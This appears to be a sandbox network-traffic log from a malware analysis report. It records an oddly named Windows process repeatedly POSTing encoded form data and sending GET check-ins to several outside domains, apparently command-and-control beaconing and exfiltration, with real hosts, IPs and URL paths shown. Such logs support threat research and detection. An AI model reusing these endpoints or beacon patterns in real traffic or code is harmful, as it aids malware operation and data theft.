                                                          Data Ascii: WLtH=duT9QTO+95xe8DjnobMuiol6ILpz2OMf0IMSx+ejjtLNrV5+WboQ69ArKmpcDNH6n/zLE6fwbJpqau0oLiTQ7PFsz4FnEL+Cu1+DRvtEQTQC8ek9UASsKMflvfRNuO1qeJf9uao2QuGp0D+YqXurILAE+K++x5tCjNA1TbCQSTT1zRq3OtFcpAOsx5+o


                                                          Session ID: 6 | Source IP: 192.168.2.10 | Source Port: 49981 | Destination IP: 206.238.89.119 | Destination Port: 80 | PID: 6352 | Process: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:32:37.470510006 CET | 857 | OUT | POST /2mep/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.127358.win
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 217
                                                          Cache-Control: no-cache
                                                          Origin: http://www.127358.win
                                                          Referer: http://www.127358.win/2mep/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Ascii: WLtH=duT9QTO+95xe8iTn7MQukIl9Wbpz4eMb0IASx8zoifvNs0J+HvcQ3dArS2pdd9HHn//1E7jwbNJqauEoLRLf4/F57YFpb7+Cu1+DRv5+QX8C8uU9WhSjAsfmsfRN4O1ueJfbubEcQoKp0B2YqGuoCLACj6/9g4wnvvYOXJqlIRLI5QXwf8kL63Si//LCjYGLs9NNjgwN69qigqNU/Q==


                                                          Session ID: 7 | Source IP: 192.168.2.10 | Source Port: 49982 | Destination IP: 206.238.89.119 | Destination Port: 80 | PID: 6352 | Process: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:32:40.026175976 CET | 1870 | OUT | POST /2mep/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.127358.win
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.127358.win
                                                          Referer: http://www.127358.win/2mep/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)


                                                          Session ID: 8 | Source IP: 192.168.2.10 | Source Port: 49983 | Destination IP: 206.238.89.119 | Destination Port: 80 | PID: 6352 | Process: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:32:42.646234989 CET | 579 | OUT | GET /2mep/?WLtH=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdn4oV88xJK42NkH/MJMBzZ1962N0iLw==&W0-=CzJDBfQxOTFPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.127358.win
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)


                                                          Session ID: 9 | Source IP: 192.168.2.10 | Source Port: 49984 | Destination IP: 66.29.149.46 | Destination Port: 80 | PID: 6352 | Process: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:09.042598009 CET | 851 | OUT | POST /cnve/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.infohive.website
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 193
                                                          Cache-Control: no-cache
                                                          Origin: http://www.infohive.website
                                                          Referer: http://www.infohive.website/cnve/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Ascii: WLtH=7XryTos10RqWkDdZe076Z4t+QpDkYc6Djr62IVM8viH7gZQRRWRSTfeNMRhUaXHkacAdonGtJvVa6sJWc8BQFXwtV1aW1tPWdao9JRBvttFVPS5Vrnevm9FsUuX+xb3vikbbTdiz1okqNnvhXvOqNQUROaeeGBz3Mpqu1vNf1EK7gpoDjZBaTL5dH1P3


                                                          Session ID: 10 | Source IP: 192.168.2.10 | Source Port: 49985 | Destination IP: 66.29.149.46 | Destination Port: 80 | PID: 6352 | Process: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:11.594050884 CET | 875 | OUT | POST /cnve/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.infohive.website
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 217
                                                          Cache-Control: no-cache
                                                          Origin: http://www.infohive.website
                                                          Referer: http://www.infohive.website/cnve/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Ascii: WLtH=7XryTos10RqWnjtZNDn6S4txVpDkR87Ijr+2IU5ksQT7n7IRQT9SUfeNUBhVHHHZacMVomqtJvBa6ptWcP5PX3wvdVaU/NPWdao9JRVJtrtVPipVkmesl9FjC+X+mr3jikaMTc/o1rcqNmfhX9mpDQVYTKfXOUCdPJCHtu0fonnTjIVEyIgNA8lTJz6ddNFkmDBAvrEym1UbsdDcsA==
                                                          Jan 11, 2025 03:33:12.188391924 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 02:33:12 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session ID: 11 | Source IP: 192.168.2.10 | Source Port: 49986 | Destination IP: 66.29.149.46 | Destination Port: 80 | PID: 6352 | Process: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:14.136616945 CET | 1888 | OUT | POST /cnve/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.infohive.website
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.infohive.website
                                                          Referer: http://www.infohive.website/cnve/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:33:14.741681099 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 02:33:14 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session ID: 12 | Source IP: 192.168.2.10 | Source Port: 49987 | Destination IP: 66.29.149.46 | Destination Port: 80 | PID: 6352 | Process: C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:16.679600954 CET | 585 | OUT | GET /cnve/?WLtH=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVbx8sa0WS/cLCNqs3fCZ4mL4UPzN89Q==&W0-=CzJDBfQxOTFPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.infohive.website
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:33:17.274293900 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 02:33:17 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          13 | 192.168.2.10 | 49988 | 217.70.184.50 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:22.380213022 CET | 839 | OUT | POST /ead0/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sunnyz.store
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 193
                                                          Cache-Control: no-cache
                                                          Origin: http://www.sunnyz.store
                                                          Referer: http://www.sunnyz.store/ead0/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Ascii: WLtH=DyPyhmSylgtmHmaUqWo04TxUEC3xJ6Ekwy4tjyCsHMqvLAkW4GVl/Pve6+W8uUQH6GlfzB6199AXc6igxS/vk8mutZUlUTKhgXB5NBSx3Y5/oQG4ps/F7WQur4JGrpIG7gfWUxJ4MexIeCR2dOGM//QgCneVcl0nyXHb0APhE9LiMgsjbI8wYGTsqkHg
                                                          Jan 11, 2025 03:33:22.966058016 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 02:33:22 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          14 | 192.168.2.10 | 49989 | 217.70.184.50 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:24.934149027 CET | 863 | OUT | POST /ead0/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sunnyz.store
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 217
                                                          Cache-Control: no-cache
                                                          Origin: http://www.sunnyz.store
                                                          Referer: http://www.sunnyz.store/ead0/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Ascii: WLtH=DyPyhmSylgtmVWKUs1Q0vjxTBC3xCaEowy0tjzXzG+evOQUWqThlxvve1eWlqUQy6GogzEa199kXc6SgwlLo+Mmsl5UnazKhgXB5NFCX3Yh/ph2449/GkmQp9oJGgJId7gfgUwVWMdZIeA52d8uNkPQqcXfGS1V590Xb7CrIY7aHPBRkKZdnLxPikiyKsABJfthw8uVkohge+YmWNA==
                                                          Jan 11, 2025 03:33:25.551336050 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 02:33:25 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          15 | 192.168.2.10 | 49990 | 217.70.184.50 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:27.485584974 CET | 1876 | OUT | POST /ead0/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sunnyz.store
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.sunnyz.store
                                                          Referer: http://www.sunnyz.store/ead0/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:33:28.071480989 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 02:33:27 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          16 | 192.168.2.10 | 49991 | 217.70.184.50 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:30.021702051 CET | 581 | OUT | GET /ead0/?WLtH=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBhs+/iOoUSS+snV9WWhaA8IUFph6/7A==&W0-=CzJDBfQxOTFPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sunnyz.store
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:33:30.621088982 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 02:33:30 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Security-Policy: default-src 'self'; script-src 'nonce-8c8ee1ccc8d44976ab020ba18eb6b684';
                                                          Vary: Accept-Language
                                                          Data Ascii: 91c<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-8c8ee1ccc8d44976ab020ba18eb6b684';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>sunnyz.store</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class
                                                          Jan 11, 2025 03:33:30.621104002 CET | 1236 | IN | Data Ascii: ="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=s
                                                          Jan 11, 2025 03:33:30.621119022 CET | 155 | IN | Data Ascii: ner('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'sunnyz.store'); }); });</script></main></div> </body></html>
                                                          Jan 11, 2025 03:33:30.621124029 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          17 | 192.168.2.10 | 49992 | 13.228.81.39 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:36.127999067 CET | 854 | OUT | POST /dc08/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.muasamgiare.click
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 193
                                                          Cache-Control: no-cache
                                                          Origin: http://www.muasamgiare.click
                                                          Referer: http://www.muasamgiare.click/dc08/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Ascii: WLtH=H6OXM/o3+l9agP0lUgi/lMuVot0R33Xj2xuzYtejRcc1ugyEeuT2Qr9d9Zb9Dai4uzrvw00fa/mF9mkCopTK9IPz1NSho6yOjTtcTYUy+lmya6XAQYtaDbDxvvFw9gQ7YG7jdoobF2rclyDW5nlWVWuNsMUjiwhD0RWQPk6MI2vScJ9TsXqeb7wX4vHz
                                                          Jan 11, 2025 03:33:37.057487011 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: openresty
                                                          Date: Sat, 11 Jan 2025 02:33:36 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Location: https://www.muasamgiare.click/dc08/
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          18 | 192.168.2.10 | 49993 | 13.228.81.39 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:38.683995008 CET | 878 | OUT | POST /dc08/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.muasamgiare.click
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 217
                                                          Cache-Control: no-cache
                                                          Origin: http://www.muasamgiare.click
                                                          Referer: http://www.muasamgiare.click/dc08/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Ascii: WLtH=H6OXM/o3+l9ahvklWDK/1cuS2d0R9XXn2xqzYsqNWqM1uEiEfvT2Rr9dyJb0AqixuzmMw2Qfa/yF9k8CvePN8YPx9tSj1qyOjTtcTYBl+kOyaLnAR8xbfrDyovFwswQnYG7ddpk9Fw3cl3nW52lVcWuPoMVdjFY7zzWdASm5XGLrboAU9GLJIMsZ2pyZNRRd14KylyT4NaNxRO2UcA==
                                                          Jan 11, 2025 03:33:39.608261108 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: openresty
                                                          Date: Sat, 11 Jan 2025 02:33:39 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Location: https://www.muasamgiare.click/dc08/
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          19 | 192.168.2.10 | 49994 | 13.228.81.39 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:41.231348038 CET | 1891 | OUT | POST /dc08/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.muasamgiare.click
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.muasamgiare.click
                                                          Referer: http://www.muasamgiare.click/dc08/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:33:42.183360100 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: openresty
                                                          Date: Sat, 11 Jan 2025 02:33:42 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Location: https://www.muasamgiare.click/dc08/
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          20 | 192.168.2.10 | 49995 | 13.228.81.39 | 80 | 6352 | C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 11, 2025 03:33:43.774265051 CET | 586 | OUT | GET /dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z0+LVyr2ClayYlRRqEL4rpFPwSbvhCg==&W0-=CzJDBfQxOTFPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.muasamgiare.click
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:33:44.702028990 CET | 508 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: openresty
                                                          Date: Sat, 11 Jan 2025 02:33:44 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Location: https://www.muasamgiare.click/dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z0+LVyr2ClayYlRRqEL4rpFPwSbvhCg==&W0-=CzJDBfQxOTFPL
